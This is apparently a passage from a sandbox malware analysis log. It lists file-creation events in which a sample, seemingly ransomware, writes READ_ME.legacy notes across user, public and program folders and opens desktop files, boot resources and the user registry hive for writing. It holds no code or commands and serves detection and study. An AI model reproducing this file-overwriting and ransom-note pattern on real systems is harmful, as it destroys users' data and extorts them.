Create	\Boot\pt-BR\bootmgr.exe.mui	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Boot\pt-PT\memtest.exe.mui	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Boot\pt-PT\bootmgr.exe.mui	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Boot\qps-ploc\memtest.exe.mui	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Boot\qps-ploc\bootmgr.exe.mui	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Boot\Resources\en-US\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Boot\Resources\bootres.dll	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Boot\ro-RO\bootmgr.exe.mui	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Boot\ru-RU\memtest.exe.mui	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Boot\ru-RU\bootmgr.exe.mui	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Boot\sk-SK\bootmgr.exe.mui	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Boot\sl-SI\bootmgr.exe.mui	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Boot\sr-Latn-CS\memtest.exe.mui	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Boot\sr-Latn-CS\bootmgr.exe.mui	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Boot\sr-Latn-RS\bootmgr.exe.mui	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Boot\sv-SE\memtest.exe.mui	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Boot\sv-SE\bootmgr.exe.mui	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Boot\tr-TR\memtest.exe.mui	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Boot\tr-TR\bootmgr.exe.mui	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Boot\uk-UA\bootmgr.exe.mui	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Boot\zh-CN\memtest.exe.mui	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Boot\zh-CN\bootmgr.exe.mui	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Boot\zh-HK\memtest.exe.mui	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Boot\zh-HK\bootmgr.exe.mui	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Boot\zh-TW\memtest.exe.mui	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Boot\zh-TW\bootmgr.exe.mui	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\All Users\Adobe\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\All Users\Application Data\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\All Users\Comms\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\All Users\Desktop\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\All Users\Documents\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\All Users\Microsoft OneDrive\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\All Users\Oracle\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\All Users\Package Cache\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\All Users\regid.1991-06.com.microsoft\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\All Users\SoftwareDistribution\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\All Users\Start Menu\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\All Users\Templates\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\All Users\USOPrivate\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\All Users\USOShared\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\All Users\WindowsHolographicDevices\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\Default.migrated\AppData\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\Default.migrated\Documents\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\AppData\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Application Data\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Contacts\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Cookies\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Desktop\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Documents\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Downloads\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Favorites\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Links\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Music\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\My Documents\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\NetHood\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\OneDrive\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Pictures\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\PrintHood\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Recent\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Saved Games\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Searches\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\SendTo\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Start Menu\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Templates\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Videos\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\ntuser.ini	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000002.regtrans-ms	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000001.regtrans-ms	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TM.blf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\ntuser.dat.LOG2	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\ntuser.dat.LOG1	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\NTUSER.DAT	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\Public\AccountPictures\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\Public\Desktop\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\Public\Documents\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\Public\Downloads\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\Public\Libraries\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\Public\Music\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\Public\Pictures\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\Public\Videos\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\Public\desktop.ini	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Windows10Upgrade\2052\DWINTL20.DLL	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Windows10Upgrade\dll1\webservices.dll	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Windows10Upgrade\dll1\wdscore.dll	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Windows10Upgrade\dll1\cosqueryxp.dll	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Windows10Upgrade\dll2\webservices.dll	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Windows10Upgrade\resources\amd64\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Windows10Upgrade\resources\i386\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Windows10Upgrade\resources\ux\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Windows10Upgrade\resources\hwcompatShared.txt	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Boot\Resources\en-US\bootres.dll.mui	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\All Users\Adobe\ARM\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\All Users\Microsoft OneDrive\setup\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\All Users\Oracle\Java\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\All Users\Package Cache\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\All Users\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\All Users\Package Cache\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\All Users\Package Cache\{3c3aafc8-d898-43ec-998f-965ffdae065a}\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\All Users\Package Cache\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\All Users\Package Cache\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\All Users\Package Cache\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\All Users\Package Cache\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\All Users\Package Cache\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\All Users\Package Cache\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\All Users\Package Cache\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\All Users\Package Cache\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\All Users\Package Cache\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\All Users\Package Cache\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\All Users\Package Cache\{e52a6842-b0ac-476e-b48f-378a97a67346}\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\All Users\Package Cache\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\All Users\Package Cache\{f325f05b-f963-4640-a43b-c8a494cdda0f}\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\All Users\Package Cache\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\All Users\regid.1991-06.com.microsoft\regid.1991-06.com.microsoft_Windows-10-Pro.swidtag	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\All Users\regid.1991-06.com.microsoft\regid.1991-06.com.microsoft Office 16 Click-to-Run Localization Component.swidtag	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\All Users\regid.1991-06.com.microsoft\regid.1991-06.com.microsoft Office 16 Click-to-Run Licensing Component.swidtag	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\All Users\regid.1991-06.com.microsoft\regid.1991-06.com.microsoft Office 16 Click-to-Run Extensibility Component.swidtag	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\All Users\USOPrivate\UpdateStore\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\All Users\USOShared\Logs\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\All Users\WindowsHolographicDevices\SpatialStore\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\Default.migrated\AppData\Local\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\Default.migrated\Documents\My Music\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\Default.migrated\Documents\My Pictures\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\Default.migrated\Documents\My Videos\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\AppData\Local\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\AppData\LocalLow\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\AppData\Roaming\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Contacts\desktop.ini	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Desktop\F5EXUt1f1Xqj\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Desktop\_nLSTjj.mp4	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Desktop\zPE2FmM3l3F_xcnqR.flv	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Desktop\Yij3m5BGoqJKSvC8hSbp.png	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Desktop\Y2jBPS-jbkI wKG8.jpg	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Desktop\XkKhCU sv1QB.mp3	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Desktop\XFAJVVyJEUWSh.doc	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Desktop\swc8rzeKxjOb-H.mkv	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Desktop\SoQNWjs.mkv	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Desktop\rztQtmpaTSoI.png	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Desktop\qUDO7qfocRy.flv	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Desktop\QFGPRrQMhX.wav	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Desktop\oPswvJrfbiTTgr2a.mp3	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Desktop\nZuGsnB03RDCt_Z.odp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Desktop\NNT2Q-EUeYTHvp-uTx.mp4	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Desktop\N9ikaULK4pWv DBBCI.m4a	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Desktop\N7p7MpyNnOCQiqSD.flv	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Desktop\N36jzbkDih.ppt	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Desktop\mtdTmZhWX.jpg	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Desktop\MNs390DDv--XaD9.mkv	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Desktop\LQ8cpsXke.wav	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Desktop\jW3yyW7Nouz.jpg	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Desktop\jdTKc.bmp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Desktop\H9P2qqLF3aR9XPvSe.wav	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Desktop\FnQ1UzSSx1.mkv	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Desktop\EyAD0N6ivUNINjAbLr.flv	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Desktop\desktop.ini	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Desktop\dcJ5f17K3cIy6UPZ.mp3	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Desktop\cwcm9CrMRKylfo.m4a	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Desktop\ckoufc.exe	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Desktop\bHECoAYdZGA AXNAvXF.avi	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Desktop\b1qmTDkLk5.swf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Desktop\9LK4qcZv5ITL2VTxp.mp3	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Desktop\5udgkcl9lFsDzlhn.gif	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Desktop\5ezA.jpg	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Desktop\4Vp_7.jpg	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Desktop\3zdM.png	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Desktop\2CM4hAu-L5z.mp3	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Desktop\1BoTI27Rl.m4a	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Documents\My Music\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Documents\My Pictures\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Documents\My Shapes\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Documents\My Videos\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Documents\Outlook Files\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\Documents\XrxhoYWoRmKU-MQys0y\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
